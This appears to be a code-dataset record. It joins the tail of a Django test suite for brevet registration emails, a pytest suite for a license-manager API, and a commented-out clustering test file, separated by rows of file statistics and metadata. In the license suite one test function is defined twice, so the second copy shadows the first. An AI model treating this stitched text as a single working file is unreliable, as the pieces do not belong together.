from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].extra_headers['Sender'],
'randopony@randonneurs.bc.ca')
def test_email_reply_to(self):
"""email to rider has correct reply-to address header
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].extra_headers['Reply-To'], 'djl@douglatornell.ca')
def test_email_reply_to_2_organizers(self):
"""email to rider has 2 organizers in reply-to header
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='VI', event=600, date=date(2010, 8, 7))
rider = BrevetRider.objects.get(
first_name='Ken', last_name='Bonner', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].extra_headers['Reply-To'],
'mcroy@example.com, dug.andrusiek@example.com')
def test_email_confirm_brevet_registration_msg(self):
"""email to rider has correct brevet pre-registration confirmation msg
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'pre-registered for the BC Randonneurs LM400 22-May-2010 brevet',
mail.outbox[0].body)
def test_email_brevet_url(self):
"""email to rider has correct brevet page url
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'<http://testserver/register/LM400/22May2010/>',
mail.outbox[0].body)
def test_email_event_waiver_msg(self):
"""email to rider has correct event waiver message
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'print out the event waiver form',
mail.outbox[0].body)
def test_email_event_waiver_url(self):
"""email to rider has correct event waiver url
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'<http://www.randonneurs.bc.ca/organize/eventform.pdf>',
mail.outbox[0].body)
def test_email_organizer_contact_msg(self):
"""email to rider has correct "reply to contact organizer" msg
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'auto-generated email, but you can reply to it '
'to contact the brevet organizer(s).',
mail.outbox[0].body)
def test_email_non_member_msg(self):
"""email to rider has correct non-member message
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=200, date=date(2012, 3, 17))
rider = BrevetRider.objects.get(
first_name='Fibber', last_name='McGee', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'indicated that you are NOT a member',
mail.outbox[0].body)
def test_email_membership_form_url(self):
"""email to rider has correct membership form & waiver url
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=200, date=date(2012, 3, 17))
rider = BrevetRider.objects.get(
first_name='Fibber', last_name='McGee', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'<http://www.randonneurs.bc.ca/organize/'
'2012_membership-and-waiver.pdf>',
mail.outbox[0].body)
class TestEmailToOrganizer(django.test.TestCase):
"""Unit tests for email_to_organizer task function.
"""
fixtures = ['brevets.yaml', 'riders.yaml',
'email_addresses.yaml', 'links.yaml']
def _get_target_function(self):
from ..tasks import email_to_organizer
return email_to_organizer
def _send_one(self, *args, **kwargs):
self._get_target_function()(*args, **kwargs)
def test_email_subject(self):
"""email to organizer has correct subject
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].subject,
'Doug Latornell has Pre-registered for the LM400 22-May-2010')
def test_email_to(self):
"""email to organizer has correct to address
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].to, ['djl@douglatornell.ca'])
def test_email_to_2_organizers(self):
"""email to organizer goes to multiple organizers
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='VI', event=600, date=date(2010, 8, 7))
rider = BrevetRider.objects.get(
first_name='Ken', last_name='Bonner', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].to,
'mcroy@example.com dug.andrusiek@example.com'.split())
def test_email_from(self):
"""email to organizer has correct from address
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].from_email, 'randopony@randonneurs.bc.ca')
def test_email_confirm_brevet_registration_msg(self):
"""email to organizer has correct pre-registration confirmation msg
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'Doug Latornell <djl@douglatornell.ca> has pre-registered for the '
'LM400 22-May-2010 brevet',
mail.outbox[0].body)
def test_email_confirm_brevet_url(self):
"""email to organizer has correct brevet page url
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'<http://testserver/register/LM400/22May2010/>',
mail.outbox[0].body)
def test_email_confirm_rider_list_spreadsheet_url(self):
"""email to organizer has correct rider list spreadsheet url
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'https://spreadsheets.google.com/ccc?key=bar',
mail.outbox[0].body)
def test_email_is_club_member_msg(self):
"""email to organizer has correct club membership true msg
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'has indicated that zhe is a club member', mail.outbox[0].body)
def test_email_non_member_msg(self):
"""email to organizer has correct non-member message
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=200, date=date(2012, 3, 17))
rider = BrevetRider.objects.get(
first_name='Fibber', last_name='McGee', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'has indicated that zhe is NOT a club member',
mail.outbox[0].body)
def test_email_member_before_start_msg(self):
"""email to organizer has msg re: joining club before brevet start
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=200, date=date(2012, 3, 17))
rider = BrevetRider.objects.get(
first_name='Fibber', last_name='McGee', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'join beforehand, or at the start', mail.outbox[0].body)
def test_email_qualifying_info(self):
"""email to organizer has answer to qualifying info question
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'LM300 1-May-2010', mail.outbox[0].body)
def test_email_admin_contact_msg(self):
"""email to organizer has correct admin contact email address msg
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'please send email to <{0}>'.format(settings.ADMINS[0][1]),
mail.outbox[0].body)
| 40.426702
| 79
| 0.614259
| 1,869
| 15,443
| 4.954521
| 0.093633
| 0.053996
| 0.086393
| 0.059395
| 0.894708
| 0.884125
| 0.868251
| 0.818143
| 0.77743
| 0.765875
| 0
| 0.030517
| 0.267953
| 15,443
| 381
| 80
| 40.532808
| 0.788589
| 0.108722
| 0
| 0.827586
| 0
| 0
| 0.131562
| 0.013509
| 0
| 0
| 0
| 0
| 0.086207
| 1
| 0.1
| false
| 0
| 0.193103
| 0
| 0.313793
| 0.003448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9dff2e1148fd3e965cf5d7d9b2cf87c43528db7b
| 14,004
|
py
|
Python
|
backend/tests/api/test_license.py
|
omnivector-solutions/license-manager
|
9eb1e4569d692aef83a2388096e7413bc010be61
|
[
"MIT"
] | 2
|
2020-11-15T22:54:39.000Z
|
2022-02-15T07:58:55.000Z
|
backend/tests/api/test_license.py
|
omnivector-solutions/license-manager
|
9eb1e4569d692aef83a2388096e7413bc010be61
|
[
"MIT"
] | 2
|
2022-02-18T19:36:45.000Z
|
2022-03-16T23:07:44.000Z
|
backend/tests/api/test_license.py
|
omnivector-solutions/license-manager
|
9eb1e4569d692aef83a2388096e7413bc010be61
|
[
"MIT"
] | null | null | null |
from unittest import mock
from fastapi import HTTPException, status
from httpx import AsyncClient
from pytest import mark, raises
from lm_backend.api import license
from lm_backend.api.permissions import Permissions
from lm_backend.api_schemas import BookingRow, LicenseUseReconcile, LicenseUseReconcileRequest
from lm_backend.storage import database
from lm_backend.table_schemas import booking_table, config_table, license_table
def test_license_use_available():
"""
Do we correctly calculate available on a LicenseUse object
"""
lu = license.LicenseUse(
product_feature="hello.world",
total=100,
used=81,
)
assert lu.available == 19
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_get_these_licenses(some_licenses, insert_objects):
"""
Make sure we get these licenses
"""
await insert_objects(some_licenses, license_table)
fetched = await license._get_these_licenses(["hello.world", "cool.beans"])
assert fetched == [
license.LicenseUse(
product_feature="cool.beans",
total=11,
used=11,
),
license.LicenseUse(
product_feature="hello.world",
total=100,
used=19,
),
]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_find_license_updates_and_inserts(some_licenses):
"""
Do we correctly match a list of objects against the database and
determine which are new and which are updating?
"""
# initially, everything should be an insert
updates, inserts = await license._find_license_updates_and_inserts(some_licenses)
assert len(updates) == 0
assert len(inserts) == 3
# let's insert 2 of the three
del inserts["cool.beans"]
await database.execute_many(query=license_table.insert(), values=[i.dict() for i in inserts.values()])
# try again, now 2 should be updates and 2 should be inserts
updates, inserts = await license._find_license_updates_and_inserts(some_licenses)
assert list(updates.keys()) == ["hello.dolly", "hello.world"]
assert list(inserts.keys()) == ["cool.beans"]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_product__success(
backend_client: AsyncClient,
some_licenses,
insert_objects,
inject_security_header,
):
"""
Do I fetch and order the licenses in the db?
"""
await insert_objects(some_licenses, license_table)
inject_security_header("owner1", Permissions.LICENSE_VIEW)
resp = await backend_client.get("/lm/api/v1/license/use/hello")
assert resp.status_code == status.HTTP_200_OK
assert resp.json() == [
dict(
product_feature="hello.dolly",
total=80,
used=11,
available=69,
),
dict(product_feature="hello.world", total=100, used=19, available=81),
]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_product__fail_on_bad_permission(
backend_client: AsyncClient,
some_licenses,
insert_objects,
inject_security_header,
):
"""
Do I return a 401 or 403 if permissions are missing or invalid?
"""
await insert_objects(some_licenses, license_table)
# No Permission
resp = await backend_client.get("/lm/api/v1/license/use/hello")
assert resp.status_code == status.HTTP_401_UNAUTHORIZED
# Bad Permission
inject_security_header("owner1", "invalid-permission")
resp = await backend_client.get("/lm/api/v1/license/use/hello")
assert resp.status_code == status.HTTP_403_FORBIDDEN
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_product_feature__success(
backend_client: AsyncClient,
some_licenses,
insert_objects,
inject_security_header,
):
"""
Do I fetch and order the licenses in the db?
"""
await insert_objects(some_licenses, license_table)
inject_security_header("owner1", Permissions.LICENSE_VIEW)
resp = await backend_client.get("/lm/api/v1/license/use/cool/beans")
assert resp.status_code == status.HTTP_200_OK
assert resp.json() == [
dict(
product_feature="cool.beans",
total=11,
used=11,
available=0,
),
]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_product_feature__fail_on_bad_permission(
backend_client: AsyncClient,
some_licenses,
insert_objects,
inject_security_header,
):
"""
Do I return a 401 or 403 if permissions are missing or invalid?
"""
await insert_objects(some_licenses, license_table)
# No Permission
resp = await backend_client.get("/lm/api/v1/license/use/cool/beans")
assert resp.status_code == status.HTTP_401_UNAUTHORIZED
# Invalid Permission
inject_security_header("owner1", "invalid-permission")
resp = await backend_client.get("/lm/api/v1/license/use/cool/beans")
assert resp.status_code == status.HTTP_403_FORBIDDEN
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_all__success(
backend_client: AsyncClient, some_licenses, insert_objects, inject_security_header
):
"""
Do I fetch and order the licenses in the db?
"""
await insert_objects(some_licenses, license_table)
inject_security_header("owner1", Permissions.LICENSE_VIEW)
resp = await backend_client.get("/lm/api/v1/license/all")
assert resp.status_code == 200
assert resp.json() == [
dict(product_feature="cool.beans", total=11, used=11, available=0),
dict(
product_feature="hello.dolly",
total=80,
used=11,
available=69,
),
dict(product_feature="hello.world", total=100, used=19, available=81),
]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_all__with_search(
backend_client: AsyncClient, some_licenses, insert_objects, inject_security_header
):
"""
Do I fetch and filter by the supplied search term the licenses in the db?
"""
await insert_objects(some_licenses, license_table)
inject_security_header("owner1", Permissions.LICENSE_VIEW)
resp = await backend_client.get("/lm/api/v1/license/all?search=dolly")
assert resp.status_code == 200
assert resp.json() == [
dict(
product_feature="hello.dolly",
total=80,
used=11,
available=69,
),
]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_all__success(
backend_client: AsyncClient, some_licenses, insert_objects, inject_security_header
):
"""
Do I fetch and order the licenses in the db by the supplied sort params?
"""
await insert_objects(some_licenses, license_table)
inject_security_header("owner1", Permissions.LICENSE_VIEW)
resp = await backend_client.get("/lm/api/v1/license/all?sort_field=total&sort_ascending=false")
assert resp.status_code == 200
assert resp.json() == [
dict(product_feature="hello.world", total=100, used=19, available=81),
dict(
product_feature="hello.dolly",
total=80,
used=11,
available=69,
),
dict(product_feature="cool.beans", total=11, used=11, available=0),
]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_all__fail_on_bad_permission(
backend_client: AsyncClient, some_licenses, insert_objects, inject_security_header
):
"""
Do I return a 401 or 403 if permissions are missing or invalid?
"""
await insert_objects(some_licenses, license_table)
# No Permission
# Invalid Permission
resp = await backend_client.get("/lm/api/v1/license/all")
assert resp.status_code == 401
# Invalid Permission
inject_security_header("owner1", "invalid_permission")
resp = await backend_client.get("/lm/api/v1/license/all")
assert resp.status_code == 403
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_delete_if_in_use_booking(insert_objects, some_licenses, some_config_rows, some_booking_rows):
"""
Make sure the given LicenseUseReconcileRequest gets deleted only if the pair booked, lead_host,
user_name and product_feature exists in the booking table.
"""
await insert_objects(some_config_rows, config_table)
await insert_objects(some_booking_rows, booking_table)
await insert_objects(some_licenses, license_table)
used_licenses = [
{"booked": 19, "lead_host": "host1", "user_name": "user1"},
{"booked": 11, "lead_host": "host1", "user_name": "user1"},
{"booked": 12, "lead_host": "host1", "user_name": "user1"},
{"booked": 13, "lead_host": "host1", "user_name": "user1"},
{"booked": 14, "lead_host": "host1", "user_name": "user1"},
]
license_reconcile_request = LicenseUseReconcileRequest(
used=19, product_feature="hello.world", total=100, used_licenses=used_licenses
)
await license._delete_if_in_use_booking(license_reconcile_request)
booking_rows = await database.fetch_all(booking_table.select())
assert len(booking_rows) == len(some_booking_rows) - 1 # i.e. one got deleted
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_delete_if_in_use_booking_empty(
insert_objects, some_licenses, some_config_rows, some_booking_rows
):
"""
Check if the function works well given a used_liceses empty and don't delete anything from the
booking_table.
"""
await insert_objects(some_config_rows, config_table)
await insert_objects(some_booking_rows, booking_table)
await insert_objects(some_licenses, license_table)
used_licenses = []
license_reconcile_request = LicenseUseReconcileRequest(
used=19, product_feature="hello.world", total=100, used_licenses=used_licenses
)
await license._delete_if_in_use_booking(license_reconcile_request)
booking_rows = await database.fetch_all(booking_table.select())
assert len(booking_rows) == len(some_booking_rows)
@mark.asyncio
@mock.patch("lm_backend.api.license._delete_if_in_use_booking")
@database.transaction(force_rollback=True)
async def test_clean_up_in_use_booking_conversion(delete_in_use_mock: mock.AsyncMock):
"""
Check if the _clean_up_in_use_booking actually converts the data type and calls the
_delete_if_in_use_booking.
"""
used_licenses = [
{"booked": 19, "lead_host": "host1", "user_name": "user1"},
{"booked": 11, "lead_host": "host1", "user_name": "user1"},
{"booked": 12, "lead_host": "host1", "user_name": "user1"},
{"booked": 13, "lead_host": "host1", "user_name": "user1"},
{"booked": 14, "lead_host": "host1", "user_name": "user1"},
]
license_reconcile_requests = [
LicenseUseReconcileRequest(
used=19, product_feature="hello.world", total=100, used_licenses=used_licenses
),
LicenseUseReconcileRequest(
used=11, product_feature="hello.dolly", total=100, used_licenses=used_licenses
),
]
license_reconciles = await license._clean_up_in_use_booking(license_reconcile_requests)
assert len(license_reconciles) == len(license_reconcile_requests)
assert isinstance(license_reconciles[0], LicenseUseReconcile)
assert isinstance(license_reconciles[1], LicenseUseReconcile)
assert delete_in_use_mock.await_count == 2
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_reconcile_changes_clean_up_in_use_bookings__success(
insert_objects,
some_licenses,
some_config_rows,
some_booking_rows,
backend_client,
inject_security_header,
):
"""
Make sure the /reconcile endpoint correct handle the in use cleanup.
"""
await insert_objects(some_config_rows, config_table)
await insert_objects(some_booking_rows, booking_table)
await insert_objects(some_licenses, license_table)
used_licenses = [
{"booked": 19, "lead_host": "host1", "user_name": "user1"},
]
license_reconcile_request = LicenseUseReconcileRequest(
used=19, product_feature="hello.world", total=100, used_licenses=used_licenses
)
inject_security_header("owner1", Permissions.LICENSE_EDIT)
response = await backend_client.patch(
"/lm/api/v1/license/reconcile", json=[license_reconcile_request.dict()]
)
assert response.status_code == status.HTTP_200_OK
booking_rows = await database.fetch_all(booking_table.select())
assert len(booking_rows) == len(some_booking_rows) - 1 # i.e. one got deleted
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_reconcile_changes_clean_up_in_use_bookings__fail_on_bad_permission(
insert_objects,
some_licenses,
some_config_rows,
some_booking_rows,
backend_client,
inject_security_header,
):
"""
Do I return a 401 or 403 if permissions are missing or invalid?
"""
await insert_objects(some_config_rows, config_table)
await insert_objects(some_booking_rows, booking_table)
await insert_objects(some_licenses, license_table)
used_licenses = [
{"booked": 19, "lead_host": "host1", "user_name": "user1"},
]
license_reconcile_request = LicenseUseReconcileRequest(
used=19, product_feature="hello.world", total=100, used_licenses=used_licenses
)
# No Permission
response = await backend_client.patch(
"/lm/api/v1/license/reconcile", json=[license_reconcile_request.dict()]
)
assert response.status_code == status.HTTP_401_UNAUTHORIZED
# Invalid Permission
inject_security_header("owner1", "invalid-permission")
response = await backend_client.patch(
"/lm/api/v1/license/reconcile", json=[license_reconcile_request.dict()]
)
assert response.status_code == status.HTTP_403_FORBIDDEN
| 33.663462
| 108
| 0.709654
| 1,760
| 14,004
| 5.360795
| 0.118182
| 0.046847
| 0.045045
| 0.048967
| 0.811553
| 0.799152
| 0.786433
| 0.777742
| 0.76725
| 0.756015
| 0
| 0.022371
| 0.189232
| 14,004
| 415
| 109
| 33.744578
| 0.808614
| 0.026921
| 0
| 0.742268
| 0
| 0
| 0.104996
| 0.038924
| 0
| 0
| 0
| 0
| 0.109966
| 1
| 0.003436
| false
| 0
| 0.030928
| 0
| 0.034364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae3d5690e77dedad9006a5f25e41fbaaa2d6b355
| 2,234
|
py
|
Python
|
app/python/testing/modules_and_functions/test_cluster_filter.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 6
|
2016-04-14T11:47:43.000Z
|
2022-01-29T14:34:59.000Z
|
app/python/testing/modules_and_functions/test_cluster_filter.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 2
|
2019-12-21T12:15:46.000Z
|
2021-01-08T12:22:17.000Z
|
app/python/testing/modules_and_functions/test_cluster_filter.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 1
|
2021-03-04T10:26:18.000Z
|
2021-03-04T10:26:18.000Z
|
# import sys, os
# sys.path.insert(0, os.path.dirname(os.path.abspath(os.path.realpath(__file__))))
#
# import pytest
# import requests
# import ast
#
# import variables, cluster_filter
#
#
# def test_filter_parents_if_same_foreground(example_output_genome, pqo_STRING):
# df = example_output_genome
# df["level"] = df["id"].apply(lambda term: pqo_STRING.functerm_2_level_dict[term])
# df_after = cluster_filter.filter_parents_if_same_foreground(dfi, pqo_STRING.functerm_2_level_dict))
# # check that number of rows decreases or stays the same
# assert example_output_genome.shape[0] >= df_after.shape[0]
# assert sum(example_output_genome.duplicated()) == 0
# assert sum(df_after.duplicated()) == 0
#
# def test_filter_parents_if_same_foreground_2(example_output_genome, pqo_STRING):
# df = example_output_genome
# df["level"] = df["id"].apply(lambda term: pqo_STRING.functerm_2_level_dict[term])
# assert sum(example_output_genome.duplicated()) == 0
# example_output_genome = cluster_filter.filter_parents_if_same_foreground(df, pqo_STRING.functerm_2_level_dict))
# # check that number of rows decreases or stays the same
# assert sum(example_output_genome.duplicated()) == 0
#
# def test_filter_parents_if_same_foreground_v2(example_output_genome, pqo_STRING):
# df = example_output_genome
# df["level"] = df["id"].apply(lambda term: pqo_STRING.functerm_2_level_dict[term])
# df_after = cluster_filter.filter_parents_if_same_foreground_v2(example_output_genome)
# # check that number of rows decreases or stays the same
# assert example_output_genome.shape[0] >= df_after.shape[0]
# assert sum(example_output_genome.duplicated()) == 0
# assert sum(df_after.duplicated()) == 0
#
# def test_filter_parents_if_same_foreground_2_v2(example_output_genome, pqo_STRING):
# df = example_output_genome
# df["level"] = df["id"].apply(lambda term: pqo_STRING.functerm_2_level_dict[term])
# assert sum(example_output_genome.duplicated()) == 0
# example_output_genome = cluster_filter.filter_parents_if_same_foreground_v2(df)
# # check that number of rows decreases or stays the same
# assert sum(example_output_genome.duplicated()) == 0
#
| 49.644444
| 117
| 0.754252
| 323
| 2,234
| 4.835913
| 0.160991
| 0.158131
| 0.231114
| 0.097311
| 0.911012
| 0.911012
| 0.911012
| 0.887964
| 0.886684
| 0.850192
| 0
| 0.012953
| 0.136079
| 2,234
| 44
| 118
| 50.772727
| 0.796373
| 0.958371
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ae49589e940ad167ea2313725e4e4a5ef97de3a4
| 2,618
|
py
|
Python
|
association/migrations/0005_auto_20210503_2140.py
|
bpprc/database
|
6e8302729793ddf840630840bd08c96ddd35a52e
|
[
"BSD-3-Clause"
] | 1
|
2021-04-14T16:54:57.000Z
|
2021-04-14T16:54:57.000Z
|
association/migrations/0005_auto_20210503_2140.py
|
bpprc/database
|
6e8302729793ddf840630840bd08c96ddd35a52e
|
[
"BSD-3-Clause"
] | null | null | null |
association/migrations/0005_auto_20210503_2140.py
|
bpprc/database
|
6e8302729793ddf840630840bd08c96ddd35a52e
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.1.4 on 2021-05-04 02:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("association", "0004_auto_20210503_2133"),
]
operations = [
migrations.AlterField(
model_name="association",
name="assay_material",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="assay_method",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="comment",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="data_entered_by",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="instar",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="lc50",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="life_stage",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="non_toxic",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="other_citations",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="percentage_mortality",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="publication",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="target_order",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="target_species",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="taxonid",
field=models.TextField(null=True),
),
migrations.AlterField(
model_name="association",
name="units",
field=models.TextField(null=True),
),
]
| 29.41573
| 51
| 0.539725
| 219
| 2,618
| 6.324201
| 0.251142
| 0.216607
| 0.270758
| 0.314079
| 0.795668
| 0.775451
| 0.775451
| 0.736462
| 0.736462
| 0.736462
| 0
| 0.01931
| 0.347212
| 2,618
| 88
| 52
| 29.75
| 0.791106
| 0.017189
| 0
| 0.731707
| 1
| 0
| 0.140023
| 0.008946
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012195
| 0
| 0.04878
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
881d8d281f43d6eed77d3efc8551c6adc6176b5c
| 240
|
py
|
Python
|
forte/processors/__init__.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
forte/processors/__init__.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
forte/processors/__init__.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
from forte.processors.ner_predictor import *
from forte.processors.sentence_predictor import *
from forte.processors.srl_predictor import *
from forte.processors.txtgen_predictor import *
from forte.processors.vocabulary_processor import *
| 40
| 51
| 0.854167
| 30
| 240
| 6.666667
| 0.366667
| 0.225
| 0.475
| 0.48
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 240
| 5
| 52
| 48
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
88364c58c415806a690fe3bddd95a2e43daaaf59
| 46,580
|
py
|
Python
|
